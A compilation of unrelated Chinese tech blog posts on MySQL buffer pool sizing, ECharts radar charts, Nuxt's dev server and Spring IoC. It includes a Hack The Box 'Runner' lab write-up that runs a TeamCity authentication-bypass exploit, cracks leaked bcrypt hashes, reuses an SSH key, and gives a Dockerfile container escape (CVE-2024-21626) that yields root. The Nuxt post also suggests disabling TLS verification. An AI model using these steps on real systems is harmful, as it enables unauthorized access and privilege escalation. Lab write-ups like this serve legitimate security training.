2024年9月

innodb_buffer_pool_size是什么?

innodb_buffer_pool是
InnoDB
缓冲池,是一个内存区域保存缓存的
InnoDB
数据为表、索引和其他辅助缓冲区。innodb_buffer_pool_size 是这个缓冲池的大小,默认128M(即134217728 bytes)。

innodb_buffer_pool_size有什么用?

如果不设置innodb_buffer_pool_size,在生产环境的sql执行效率将大大下降,原因是缓存的空间变小,能缓存的数据量有限,缓存的命中率大打折扣,会导致反复去磁盘上读数据,众所周知磁盘的速度远远低于内存的执行效率。

innodb_buffer_pool_size的值配置有什么要求?

innodb_buffer_pool_size的值必须是(
innodb_buffer_pool_chunk_size * innodb_buffer_pool_instances
)的整数倍,即可以相等或更大。

-- 显示当前使用的innodb缓冲池大小 及 缓冲池实例数与主干大小
SELECT @@innodb_buffer_pool_size as pool_size,
@@innodb_buffer_pool_instances as pool_instances,
@@innodb_buffer_pool_chunk_size as chunk_size;

innodb_buffer_pool_size设置方式

两种设置方式,区别在于MySQL的运行状态,静态设置需要重启MySQL,动态设置在MySQL运行期动态调整。

静态设置

  • 修改my.cnf,在
    [mysqld]
    作用域添加
    innodb_buffer_pool_size=计算值
  • 重启mysql。

动态设置

  • 执行
    SET GLOBAL innodb_buffer_pool_size=计算值;
    设置缓冲池大小。
  • 执行
    SHOW STATUS WHERE Variable_name='InnoDB_buffer_pool_resize_status';
    查询缓冲池大小改变状态,出现
    Completed resizing buffer pool at 时间戳
    即完成。
  • 执行
    SELECT @@innodb_buffer_pool_size;
    查询当前缓冲池大小。

ECharts 是一款由百度开源的数据可视化工具,它提供了丰富的图表类型,如折线图、柱状图、饼图、散点图、
雷达图
、地图、K线图、热力图、仪表盘等,以及丰富的交互功能。ECharts 组件的核心功能实现原理主要包括以下几个方面:

  1. 数据驱动

    ECharts 采用数据驱动的设计理念,图表的生成和更新都是基于数据的。用户通过设置
    option
    对象来描述图表的配置,包括数据、坐标轴、系列类型、图例等信息。

  2. Canvas 或 SVG 渲染

    ECharts 支持使用 Canvas 或 SVG 作为底层渲染引擎。Canvas 适合动态或实时的图表渲染,而 SVG 适合静态或交互较多的图表。ECharts 默认使用 Canvas 渲染。

  3. 响应式布局

    ECharts 支持响应式布局,图表容器的大小可以动态变化,图表会根据容器的大小自动缩放。

  4. 动画效果

    ECharts 提供了丰富的动画效果,包括数据的渐显、数据的过渡动画等,使得数据的变化更加直观和生动。

  5. 交互功能

    ECharts 支持多种交互功能,如工具提示(Tooltip)、数据缩放(DataZoom)、图例开关(Legend)、坐标轴缩放(AxisZoom)等,增强了用户的交互体验。

  6. 事件监听

    ECharts 提供了事件监听机制,用户可以监听并响应图表的各种事件,如点击、悬浮、数据项选择等,从而实现复杂的交互逻辑。

  7. 多维度数据展示

    ECharts 允许用户在图表中展示多维度的数据,例如在散点图中通过数据点的颜色和大小来表示额外的维度。

  8. 扩展性和定制性

    ECharts 提供了扩展和定制的能力,用户可以通过自定义系列(Custom Series)和扩展插件来实现特殊的图表效果。

  9. 性能优化

    ECharts 进行了一系列的性能优化,如懒渲染、脏矩形渲染、层级渲染等,以支持大数据量的图表渲染。

  10. 多语言支持

    ECharts 支持多语言,可以根据用户的语言偏好显示不同的文本内容。

  11. 组件化设计

    ECharts 的图表由多个组件组成,如标题(Title)、工具箱(Toolbox)、图例(Legend)、坐标轴(Axis)、数据系列(Series)等,每个组件都有独立的配置项。

  12. 数据转换和处理

    ECharts 提供了数据转换和处理的功能,如数据的过滤、排序、聚合等,使得数据可以按照用户的需要进行展示。

ECharts 的实现原理涉及到了计算机图形学、数据结构、动画设计等多个领域的知识。它的设计哲学是简单、灵活、可扩展,这使得它成为了数据可视化领域非常受欢迎的工具之一。

下面我们以实现雷达图为例,来介绍具体的代码实现案例。

如何使用 ECharts 实现一个交互式的雷达图?

要使用 ECharts 实现一个交互式的雷达图,我们需要设置雷达图的配置项,并且可以通过监听用户的交互事件来增强图表的互动性,废话不多说,上代码:

步骤1:引入ECharts库

首先,在你的HTML文件中引入ECharts库:

<script src="https://cdn.jsdelivr.net/npm/echarts/dist/echarts.min.js"></script>

步骤2:创建图表容器

在HTML文件中,为雷达图创建一个容器:

<div id="main" style="width: 600px;height:400px;"></div>

步骤3:编写雷达图配置

在JavaScript中,初始化ECharts实例并配置雷达图。我们需要定义雷达图的指标(indicator),数据(series)以及其他配置项。

var myChart = echarts.init(document.getElementById('main'));

var option = {
    title: {
        text: '交互式雷达图'
    },
    tooltip: {},
    legend: {
        data: ['预算分配(Allocated Budget)', '实际开销(Actual Spending)']
    },
    radar: {
        // shape: 'circle',
        name: {
            textStyle: {
                color: '#fff',
                backgroundColor: '#999',
                borderRadius: 3,
                padding: [3, 5]
           }
        },
        indicator: [
           { name: '销售(sales)', max: 6500},
           { name: '管理(Administration)', max: 16000},
           { name: '信息技术(Information Technology)', max: 30000},
           { name: '客服(Customer Support)', max: 38000},
           { name: '研发(Development)', max: 52000},
           { name: '市场(Marketing)', max: 25000}
        ]
    },
    series: [{
        name: '预算 vs 开销(Budget vs spending)',
        type: 'radar',
        // areaStyle: {normal: {}},
        data : [
            {
                value : [4200, 30000, 20000, 35000, 50000, 18000],
                name : '预算分配(Allocated Budget)'
            },
             {
                value : [5000, 14000, 28000, 26000, 42000, 21000],
                name : '实际开销(Actual Spending)'
            }
        ]
    }]
};

myChart.setOption(option);

步骤4:添加交互功能

我们可以通过监听ECharts提供的事件来添加交互功能,例如
click
事件、
mouseover
事件等。

myChart.on('click', function (params) {
    // 点击雷达图的某个区域时的交互逻辑
    console.log(params.name); // 打印点击的区域名称
});

myChart.on('mouseover', function (params) {
    // 鼠标悬浮在雷达图的某个区域时的交互逻辑
    console.log(params.seriesName); // 打印鼠标悬浮的数据系列名称
});

步骤5:测试雷达图

完事,我们在浏览器中打开HTML文件,查看雷达图是否按预期显示,并且看下交互功能是否正常工作。

来解释一下

  • 雷达图配置
    :在
    option
    对象中,
    radar
    属性定义了雷达图的结构,包括指标(indicator)的最大值和名称。
    series
    属性定义了数据系列,每个系列可以表示一组数据。
  • 事件监听
    :通过
    myChart.on
    方法监听图表事件,当用户与图表交互时(如点击或悬浮),可以执行相应的逻辑。

如何使用 ECharts 实现一个带有多个系列的雷达图?

进一步看看,我们要在 ECharts 中实现一个带有多个系列的雷达图,就需要在配置项中定义多个系列(series),每个系列可以表示一组数据。来看一下代码实现:

步骤1:引入ECharts库

首先,在我们的HTML文件中引入ECharts库:

<script src="https://cdn.jsdelivr.net/npm/echarts/dist/echarts.min.js"></script>

步骤2:创建图表容器

在HTML文件中,为雷达图创建一个容器:

<div id="main" style="width: 600px;height:400px;"></div>

步骤3:编写雷达图配置

在JavaScript中,初始化ECharts实例并配置雷达图。我们需要定义雷达图的指标(indicator),多个数据系列(series)以及其他配置项。

var myChart = echarts.init(document.getElementById('main'));

var option = {
    title: {
        text: '多系列雷达图'
    },
    tooltip: {},
    legend: {
        data: ['系列1', '系列2']
    },
    radar: {
        // shape: 'circle',
        name: {
            textStyle: {
                color: '#fff',
                backgroundColor: '#999',
                borderRadius: 3,
                padding: [3, 5]
            }
        },
        indicator: [
            { name: '维度1', max: 100},
            { name: '维度2', max: 100},
            { name: '维度3', max: 100},
            { name: '维度4', max: 100},
            { name: '维度5', max: 100}
        ]
    },
    series: [{
        name: '系列1',
        type: 'radar',
        data : [
            {
                value : [80, 70, 90, 60, 70],
                name : '系列1'
            }
        ]
    },
    {
        name: '系列2',
        type: 'radar',
        data : [
            {
                value : [90, 80, 70, 90, 80],
                name : '系列2'
            }
        ]
    }]
};

myChart.setOption(option);

步骤4:测试雷达图

现在可以在浏览器中打开这个HTML文件,来查看雷达图是否按预期显示,并且多个系列是否正确展示,就不展示效果图了。

来解释一下代码实现

  • 雷达图配置
    :在
    option
    对象中,
    radar
    属性定义了雷达图的结构,包括指标(indicator)的最大值和名称。
    series
    属性定义了多个数据系列,每个系列可以表示一组数据。
  • 数据系列
    :每个系列通过
    type: 'radar'
    指定为雷达图类型,
    data
    属性包含一个数组,数组中的每个对象代表一个数据点,
    value
    属性是一个数组,包含了每个维度的值。

如何为 ECharts 雷达图设置不同的颜色和标签?

在 ECharts 中为雷达图设置不同的颜色和标签,可以通过配置项中的
series

radar
属性来实现:

步骤1:引入ECharts库

在HTML文件中引入ECharts库:

<script src="https://cdn.jsdelivr.net/npm/echarts/dist/echarts.min.js"></script>

步骤2:创建图表容器

在HTML文件中,为雷达图创建一个容器:

<div id="main" style="width: 600px;height:400px;"></div>

步骤3:编写雷达图配置

在JavaScript中,初始化ECharts实例并配置雷达图,我们就可以在
series
中设置不同的颜色和标签。

var myChart = echarts.init(document.getElementById('main'));

var option = {
    title: {
        text: '多系列雷达图'
    },
    tooltip: {},
    legend: {
        data: ['系列1', '系列2']
    },
    radar: {
        // shape: 'circle',
        name: {
            textStyle: {
                color: '#fff',
                backgroundColor: '#999',
                borderRadius: 3,
                padding: [3, 5]
            }
        },
        indicator: [
            { name: '维度1', max: 100},
            { name: '维度2', max: 100},
            { name: '维度3', max: 100},
            { name: '维度4', max: 100},
            { name: '维度5', max: 100}
        ],
        splitLine: {
            lineStyle: {
                color: 'rgba(255, 255, 255, 0.5)'
            }
        },
        splitArea: {
            areaStyle: {
                color: ['rgba(114, 172, 209, 0.2)', 'rgba(114, 172, 209, 0.4)', 'rgba(114, 172, 209, 0.6)', 'rgba(114, 172, 209, 0.8)', 'rgba(114, 172, 209, 1)']
            }
        }
    },
    series: [{
        name: '系列1',
        type: 'radar',
        color: '#f9713c', // 设置系列颜色
        data : [
            {
                value : [80, 70, 90, 60, 70],
                name : '系列1'
            }
        ]
    },
    {
        name: '系列2',
        type: 'radar',
        color: '#b3e4a1', // 设置系列颜色
        data : [
            {
                value : [90, 80, 70, 90, 80],
                name : '系列2'
            }
        ]
    }]
};

myChart.setOption(option);

步骤4:测试雷达图

接下来测试一下,在浏览器中打开HTML文件,查看雷达图,每个系列具有不同的颜色和标签。

继续解释一下代码实现

  • 颜色设置
    :在
    series
    配置中,通过
    color
    属性为每个系列设置不同的颜色。
  • 标签设置
    :在
    radar
    配置中,
    name
    属性定义了雷达图中每个维度的标签样式,包括文本颜色和背景颜色。
  • 分割线和区域颜色

    splitLine

    splitArea
    属性分别定义了雷达图的分割线和区域颜色,可以设置为渐变色或不同的颜色。

如何为 ECharts 雷达图添加动态数据更新功能?

为 ECharts 雷达图添加动态数据更新功能,我们可以使用 JavaScript 的定时器(如
setInterval
)来定期从服务器获取新数据,并使用 ECharts 提供的
setOption
方法来更新图表:

步骤1:引入ECharts库

在HTML文件中引入ECharts库:

<script src="https://cdn.jsdelivr.net/npm/echarts/dist/echarts.min.js"></script>

步骤2:创建图表容器

在HTML文件中,为雷达图创建一个容器:

<div id="main" style="width: 600px;height:400px;"></div>

步骤3:初始化雷达图

在JavaScript中,初始化ECharts实例并设置初始的雷达图配置。

var myChart = echarts.init(document.getElementById('main'));

var option = {
    // 雷达图的初始配置
    // ...
};

myChart.setOption(option);

步骤4:定义数据更新函数

创建一个函数来获取新数据并更新雷达图。我们可以使用 AJAX 请求从服务器获取数据,或者使用任何其他方法来获取数据。

function fetchDataAndUpdateChart() {
    // 假设这是获取数据的函数,可以是AJAX请求或其他方式
    // 这里使用setTimeout模拟数据更新
    setTimeout(function () {
        var newData = {
            value: [Math.random() * 100, Math.random() * 100, Math.random() * 100, Math.random() * 100, Math.random() * 100],
            name: '动态数据'
        };
        
        // 更新雷达图数据
        myChart.setOption({
            series: [{
                name: '系列1',
                data: [newData]
            }]
        });
        
        // 递归调用以实现定期更新
        fetchDataAndUpdateChart();
    }, 2000); // 每2秒更新一次数据
}

// 初始调用数据更新函数
fetchDataAndUpdateChart();

O了,完美展示一下效果。

解释代码

  • 初始化雷达图
    :设置雷达图的初始配置,包括标题、工具提示、图例、雷达指标、系列等。
  • 动态数据更新
    :通过
    fetchDataAndUpdateChart
    函数定期获取新数据,并使用
    setOption
    方法更新雷达图。在这个例子中,使用
    setTimeout
    来模拟定期从服务器获取数据。
  • 递归调用
    :在
    fetchDataAndUpdateChart
    函数的末尾递归调用自身,以实现定时更新数据。

最后

以上就是使用 ECharts 来实现雷达图的案例介绍,使用 ECharts实现数据大屏的展示,可以很炫,比如像这样的图:
https://www.bocloud.com.cn/manager/upload/202303/07/202303071455311822.png

好了,今天的内容就到这里,欢迎关注威哥爱编程,原创不易,感谢点赞关注评论,支持一下呗。

HTB-Runner靶机笔记

概述

Runner是HTB上一个中等难度的Linux靶机,它包含以下
teamcity
漏洞(CVE-2023-42793)该漏洞允许用户绕过身份验证并提取API令牌。以及docker容器逃逸CVE-2024-21626,进行提权操作

Runner靶机地址:
https://app.hackthebox.com/machines/Runner

一、nmap 扫描

1)端口扫描
nmap -sT --min-rate 10000 -p- -o ports 10.10.11.13
Warning: 10.10.11.13 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.13
Host is up (0.26s latency).
Not shown: 63375 closed tcp ports (conn-refused), 2157 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt

# Nmap done at Fri Aug 30 22:29:18 2024 -- 1 IP address (1 host up) scanned in 47.39 seconds
2)详细信息扫描
nmap -sT -sV -sC -O -p22,80,8000 -o detail 10.10.11.13
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-01 20:51 EDT
Nmap scan report for 10.10.11.13
Host is up (0.11s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_  256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp   open  http        nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://runner.htb/
8000/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.74 seconds

看到
http-title: Did not follow redirect to http://runner.htb

我们去/etc/hosts 文件中绑定域名

sudo vi /etc/hosts


10.10.11.13 runner.htb
写进去

3) 默认脚本扫描

sudo nmap --script=vuln -p22,80,8000 10.10.11.13 -o vuln 

二、web渗透

image-20240902090140120

打开主页测试与收集了一圈信息,也没有有用的,可能用到的就是主页线面的名字

image-20240902090316730

尝试了
robots.txt
,
index.php
等都是404页面

同时尝试目录爆破和子域名爆破

1)目录爆破

sudo gobuster dir -u http://runner.htb -w /usr/share/wordlists/dirb/big.txt  
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://runner.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 178] [--> http://runner.htb/assets/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================

2)子域名爆破

ffuf -u http://runner.htb -H "HOST:FUZZ.runner.htb" -w /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -fs 154
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://runner.htb
 :: Wordlist         : FUZZ: /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.runner.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 154
________________________________________________

[Status: 401, Size: 66, Words: 8, Lines: 2, Duration: 121ms]
    * FUZZ: teamcity

image-20240902090920755

左边目录,右边子域名

3)信息分析

目录爆破点开,没有有用的信息,我们扫到了一个子域名
teamcity.runner.htb
写入
/etc/hosts
文件中

echo "10.10.11.13  teamcity.runner.htb" | tee -a /etc/hosts

访问

image-20240902091633507

测试了sql注入,重置密码等,都不可以,google搜索漏洞

CVE-2023-42793 :
https://www.exploit-db.com/exploits/51884

他允许我们未授权,去创建一个管理员用户,起始读一下这个exp,他内部的原理也不难理解。就是未授权访问,导致管理员的token泄漏,利用这个token创建了一个新的管理员账户

把他的代码粘贴到kali里,空命令查看帮助

 python exp.py                               

=====================================================
*       CVE-2023-42793                              *
*  TeamCity Admin Account Creation                  *   
*                                                   *
*  Author: ByteHunter                               *
=====================================================

usage: exp.py [-h] -u URL [-v]
exp.py: error: the following arguments are required: -u/--url
python exp.py -u http://teamcity.runner.htb                              

=====================================================
*       CVE-2023-42793                              *
*  TeamCity Admin Account Creation                  *   
*                                                   *
*  Author: ByteHunter                               *
=====================================================

Token: eyJ0eXAiOiAiVENWMiJ9.Z2Q5NHVFQjFpdnJqLVpvRjVueVNkWTF4WkN3.YTM5MjkwZTktNTU1MS00MzA5LThkYTUtODc2MTQ5M2MwODUx
Successfully exploited!
URL: http://teamcity.runner.htb
Username: city_adminbsnn
Password: Main_password!!**

他给我们创建了一个管理员用户
city_adminbsnn:Main_password!!**

登陆进去

image-20240902093454029

进入后台,下载备份文件

image-20240902093613586

下载到本地进行解压

image-20240902094058407

在目录里翻一下,配置文件和数据库文件一般有会有信息,先更改权限

sudo chmod -R 777 *

翻找中发现
users
的hash值

image-20240902094845130

把凭证信息,用
awk
,
sed
,
tee
等工具处理,当然复制到新文件红也可以

John:$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye
Matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em
nspjipzg:$2a$07$NhQTyKKikNjDy4HgKBjiiuc2ftK1XelfKkNiHy.4/HjDG1qmr9w36
city_adminbwgn:$2a$07$lQsvDl0GcSMeUl95ZZWBReYJYqymfIhZf20W3gQpoRw0TFtBy875u

image-20240902095110411

用hashid识别加密方式

cat creds | awk -F: '{print $2}'|head -n 1 | hashid
Analyzing '$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye'
[+] Blowfish(OpenBSD) 
[+] Woltlab Burning Board 4.x 
[+] bcrypt 


bcrypt

查找在hashcat中的模块号

hashcat --help| grep bcrypt
   3200 | bcrypt $2*$, Blowfish (Unix)                               | Operating System
  25600 | bcrypt(md5($pass)) / bcryptmd5                             | Forums, CMS, E-Commerce
  25800 | bcrypt(sha1($pass)) / bcryptsha1                           | Forums, CMS, E-Commerce
  28400 | bcrypt(sha512($pass)) / bcryptsha512                       | Forums, CMS, E-Commerce

暴力破解密码

hashcat creds /usr/share/wordlists/rockyou.txt  --username -m 3200   

执行完成,查看结果

hashcat creds /usr/share/wordlists/rockyou.txt  --username -m 3200 --show
Matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em:piper123
a) 账号信息

凭证:
Matthew:piper123

尝试了ssh,发现不是。只能放弃了。继续去从backup备份文件找找看,是否还有其他的信息

b) ssh信息

最终找到了ssh的key

./config/projects/AllProjects/pluginData/ssh_keys/id_rsa

我们复制出来

cp ./config/projects/AllProjects/pluginData/ssh_keys/id_rsa ../../id_rsa

查看是谁的

 cat john.id_rsa | grep -v '\-' | base64 -d | strings

看到明文信息中有
john@runner

image-20240902100848517

重命名

image-20240902100446657

三、获得立足点

chmod 600 id_rsa
ssh john@10.10.11.13 -i john.id_rsa -o EnableEscapeCommandline=yes

-o EnableEscapeCommandline=yes
是允许在ssh连接时,调回到物理机执行ssh隧道命令,方便搭建sockets隧道,或建立端口转发

image-20240902101756062

image-20240902102209291

四、提权

ss -lant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      -                   
tcp        0    248 10.10.11.13:22          10.10.14.11:33776       ESTABLISHED -                   
tcp        0      0 127.0.0.1:59056         127.0.0.1:8111          TIME_WAIT   -                   
tcp        0      0 127.0.0.1:41720         127.0.0.1:8111          TIME_WAIT   -                   
tcp        0      0 10.10.11.13:80          10.10.14.11:33912       ESTABLISHED -                   
tcp        0      0 172.17.0.1:54814        172.17.0.2:8111         TIME_WAIT   -                   
tcp        0      0 127.0.0.1:8111          127.0.0.1:59430         TIME_WAIT   -     
tcp        0      0 127.0.0.1:59216         127.0.0.1:8111          TIME_WAIT   -     
tcp        0      1 10.10.11.13:38340       8.8.8.8:53              SYN_SENT    -     
tcp        0      0 172.17.0.1:34338        172.17.0.2:8111         TIME_WAIT   -     
tcp        0      0 172.17.0.1:40448        172.17.0.2:8111         TIME_WAIT   -     
tcp        0      0 127.0.0.1:58786         127.0.0.1:8111          TIME_WAIT   -     
tcp        0      0 127.0.0.1:33934         127.0.0.1:8111          TIME_WAIT   -     
tcp        0      0 127.0.0.1:8111          127.0.0.1:55392         TIME_WAIT   -     
tcp        0      0 172.17.0.1:54802        172.17.0.2:8111         TIME_WAIT   -    
tcp        0      0 127.0.0.1:41716         127.0.0.1:8111          TIME_WAIT   -    
tcp        0      0 10.10.11.13:80          10.10.16.3:34523        TIME_WAIT   -    
tcp        0      0 127.0.0.1:8111          127.0.0.1:55406         TIME_WAIT   -     
tcp        0      0 172.17.0.1:54982        172.17.0.2:8111         TIME_WAIT   -     
tcp        0      0 127.0.0.1:59044         127.0.0.1:8111          TIME_WAIT   -    
tcp        0      0 127.0.0.1:8111          127.0.0.1:59436         TIME_WAIT   -  
tcp6       0      0 :::80                   :::*                    LISTEN      -     
tcp6       0      0 :::22                   :::*                    LISTEN      -     
tcp6       0      0 :::8000                 :::*                    LISTEN      -     

看到开放了一堆本地端口,搭建ssh的sockets隧道,访问一下

在ssh会话里按
~C
进入ssh会话

image-20240902103756196

按两下回车,退出 并不会终止我们的sockets代理

在kali的本地浏览器里配置好sockets代理
127.0.0.1:1080
,就可以访问目标的资源了。我这里用的小狐狸,看大家个人喜欢吧。搭好就可以

发现9000是一个docker的管理页面.

image-20240902110347454

需要登录

在第二部获得的
凭证:
Matthew:piper123

既然不是ssh的凭证,在这里试一试

image-20240902111143253

成功登陆

既然有docker 看看runc的版本

runc --version

runc version 1.1.7-0ubuntu1~22.04.1
spec: 1.0.2-dev
 go: go1.18.1
libseccomp: 2.5.3

这个有一个容器逃逸漏洞

CVE-2024-21626:
https://www.wiz.io/blog/leaky-vessels-container-escape-vulnerabilities#cve-2024-21626-5

https://packetstormsecurity.com/files/176993/runc-1.1.11-File-Descriptor-Leak-Privilege-Escalation.html

简单理解:

就是
runc
在处理文件描述符时的不当管理。文件描述符泄漏使得新创建的容器进程可以意外地继承主机文件系统命名空间中的工作目录。这种泄漏允许容器进程访问主机文件系统,导致容器逃逸。

通过对这个漏洞的学习和理解,结合我们靶机的现状,我们在这台靶机中并不能创建和操作一个docker的image,但是我们可以在
portainer
面板中创建容器和镜像

我们在靶机中用john创建文件夹

mkdir -p /tmp/lingx5
cp /bin/bash /tmp/lingx5/bash

在创建镜像处填入

FROM ubuntu:latest
  WORKDIR /proc/self/fd/8
	RUN cd ../../../../../../../../ && \
    chmod -R 777 /tmp/lingx5 && \
    chown -R root:root /tmp/lingx5 && \
    chmod u+s /tmp/lingx5/bash

image-20240902152140077

在下方点击builimage

我们就把
/tmp/lingx5/bash
文件赋予了SUID的权限

image-20240902152022186

看到编译成功了,应该已经给我们的
/tmp/lingx5/bash
赋予了SUID权限

执行

/tmp/lingx5/bash -p

提权到root

cat /root/root.txt

image-20240902151944661

总结

  1. 我们用nmap对主机进行端口发现,发现22,80,8000端口开放。
  2. 在对80渗透过程中,发现主页的目录爆破信息很少,想到子域名爆破,爆破出
    teamcity
    子域名通过google搜索公开漏洞找到CVE-2023-42793,创建了一个管理员用户。我们登陆了进去,发现有备份功能,我们把备份文件下载到本地,在翻找过程中我们发现了
    凭证:Matthew:piper123
    以及一个john的ssh密钥
  3. 利用密钥获得了john的立足点,查看本机运行的服务,大部分都是只允许本机访问的端口,我们利用ssh搭建了一条sockets隧道,访问页面找到9000端口的docker服务。
  4. 利用
    凭证:Matthew:piper123
    登陆到了后台,通过对runc版本的判断,发现存在逃逸漏洞,利用CVE-2024-21626的原理,和一些复现的重要操作进行提权。


title: 使用 nuxi dev 启动 Nuxt 应用程序的详细指南
date: 2024/9/2
updated: 2024/9/2
author:
cmdragon

excerpt:
摘要:本文介绍了使用 nuxi dev 命令启动 Nuxt 应用程序的方法,包括安装 Nuxt.js、启动开发服务器及配置选项等详细步骤。

categories:

  • 前端开发

tags:

  • Nuxt.js
  • nuxi dev
  • 开发服务器
  • Vue.js
  • 前端开发
  • 本地环境
  • 应用启动


image
image

扫描
二维码
关注或者微信搜一搜:
编程智域 前端至全栈交流与成长

Nuxt.js 是一个流行的 Vue.js 框架,让我们能够快速开发现代化的 Web 应用。nuxi dev 命令是 Nuxt 的开发服务器,用于在本地环境中启动应用,使我们能够快速迭代和调试代码。

安装 Nuxt.js

首先,你需要确保已经在你的机器上安装了 Node.js。你可以在终端中运行以下命令来检查 Node.js 是否已安装:

node -v

如果你还没有安装 Node.js,建议去
Node.js 官方网站
下载并安装。

接下来,使用 npm 或 yarn 安装 Nuxt.js。我们可以使用以下命令创建一个新的 Nuxt 应用:

npx nuxi@latest init my-nuxt-app

在这个过程中,系统会提示你选择一些选项,比如选择 CSS 框架、Linting 工具等。根据你的需求选择即可。

启动开发服务器

安装完 Nuxt 应用后,进入到你的项目目录:

cd my-nuxt-app

现在,你可以使用
nuxi dev
命令来启动开发服务器。基础命令如下:

npx nuxi dev

这将启动一个开发服务器,默认监听在
http://localhost:3000

命令选项

nuxi dev
命令有多个可选参数,以下是一些常用选项:

  • rootDir
    :要提供的应用程序的根目录。默认值为当前目录
    .
  • --dotenv
    :指向要加载的另一个
    .env
    文件。
  • --open, -o
    :启动后自动在浏览器中打开 URL。
  • --port, -p
    :指定监听的端口,默认 3000。
  • --host, -h
    :指定服务器的主机名,默认 localhost。
  • --https
    :使用 https 协议监听。

示例:启动开发服务器

假设我们想要将开发服务器设置为在 4000 端口上运行,并在启动后自动打开浏览器。我们可以这样运行命令:

npx nuxi dev -p 4000 -o

自签名 HTTPS 证书

如果你想用 HTTPS 启动开发服务器,可以使用
--https
选项。但请注意,浏览器会对此进行警告,因为这是自签名证书。为了在开发中使用自签名证书,你需要设置环境变量:

export NODE_TLS_REJECT_UNAUTHORIZED=0

然后可以运行以下命令来启动:

npx nuxi dev --https

访问你的应用

无论使用什么配置,启动服务器后你都可以在浏览器中访问
http://localhost:3000
或指定的端口(如
http://localhost:4000
)。你应该能看到 Nuxt 应用的欢迎页面。

结论

通过上述步骤,你可以轻松启动和配置一个 Nuxt.js 的开发服务器。nuxi dev 命令提供了灵活的选项来满足不同的开发需求。实验并熟悉这些选项后,你将能更有效地开发和调试你的应用。

余下文章内容请点击跳转至 个人博客页面 或者 扫码关注或者微信搜一搜:
编程智域 前端至全栈交流与成长
,阅读完整的文章:
使用 nuxi dev 启动 Nuxt 应用程序的详细指南 | cmdragon's Blog

往期文章归档:

Spring之IOC

简介

首先,官网中有这样一句话:Spring Framework implementation of the Inversion of Control (IoC) principle.这句话翻译过来就是:Spring实现控制反转(IOC)原理,由此可以得出,Inversion of Control(IOC)是一个名为控制反转的原理,而Spring实现了他。而实现这个原理或者说设计原则的最常见的方式也是Spring框架使用的方式叫做依赖注入,也就是Dependency Injection(DI)。因此我们要讲IOC实际上就是要讲Spring是怎样实现IOC和DI的,具体用什么、怎样去做的。

  • 控制反转:类的对象从创建到销毁的整个流程都交给IOC容器去管理
  • 依赖注入:我们通过几种注入的方式将特定的bean注入到IOC容器中。

Bean

Bean是Spring实现IOC的一个重要的概念,官网是这样说的:

In Spring, the objects that form the backbone of your application and that are managed by the Spring IoC container are called beans. A bean is an object that is instantiated, assembled, and otherwise managed by a Spring IoC container.

